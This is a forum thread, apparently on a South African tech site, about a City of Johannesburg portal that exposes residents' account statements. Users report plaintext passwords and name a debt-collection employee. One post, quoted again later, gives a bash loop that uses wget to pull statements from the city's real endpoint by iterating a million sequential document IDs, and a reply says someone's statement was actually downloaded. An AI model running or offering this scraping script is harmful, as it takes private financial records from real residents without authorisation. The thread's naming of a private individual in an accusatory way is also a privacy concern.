City of Joburg security flaw exposes private info

Did they also pay R143m and use those little kids that made the Free state governments word press website?
 
How can one change details with the information? The login doesn't use the account number and pin as far as I can tell...
 
Worst part still to come: A ton of security companies will now fill out tender forms and tax payers will pay millions to fix a simple software development/architecture (a major rookie mistake - whoever the IT service provider is, should really look at their review & QA process). Makes one wonder how many more leaks like this exist and how much of this information is currently misused.

Quite scary how lenient CoJ is with collections (but then again, who knows if those invoices are correct to begin with).
 
I warned everyone months ago that the passwords are stored as plaintext.

Furthermore, the CoJ changed my email address to a debt collection company to receive my statements! I spent months harassing the individual in question, yet they denied everything.

The individual in question is Chrissenda Jacobs <[email protected]>; a quick search reveals http://www.in-quest.co.za/ to be "Commercial Debt Collection and Consumer Debt Collection" agency.

So even if this were the case, CoJ is happy to share your information with just about anyone!
 
I warned everyone months ago that the passwords are stored as plaintext.

Furthermore, the CoJ changed my email address to a debt collection company to receive my statements! I spent months harassing the individual in question, yet they denied everything.

The individual in question is Chrissenda Jacobs <[email protected]>; a quick search reveals http://www.in-quest.co.za/ to be "Commercial Debt Collection and Consumer Debt Collection" agency.

So even if this were the case, CoJ is happy to share your information with just about anyone!

That In-Quest site has been hacked as well:

This Site has been hacked by 0NullSec!

No Damage has been done to the site!

Admin please Secure your site!
 
Just for fun, here's a little bash script if you want to download a bunch of those:
for i in `seq -w 0 999999`
do
wget -c --content-disposition "http://cojestatements.co.za:8080/cojpdfweb/getPDF?documentID=112001$i&download=true"
done


Let's see who can get the most :p

But seriously, don't use this. Do not.
 
Last edited:
Holy s**t!!! I've just downloaded someone's statement,nooooooo this is so wrong,heads must roll.
 
Just for fun, here's a little bash script if you want to download a bunch of those:
for i in `seq -w 0 999999`
do
wget -c --content-disposition "http://cojestatements.co.za:8080/cojpdfweb/getPDF?documentID=112001$i&download=true"
done


Let's see who can get the most :p

But seriously, don't use this. Do not.

I would never even consider it...
 
Top
Sign up to the MyBroadband newsletter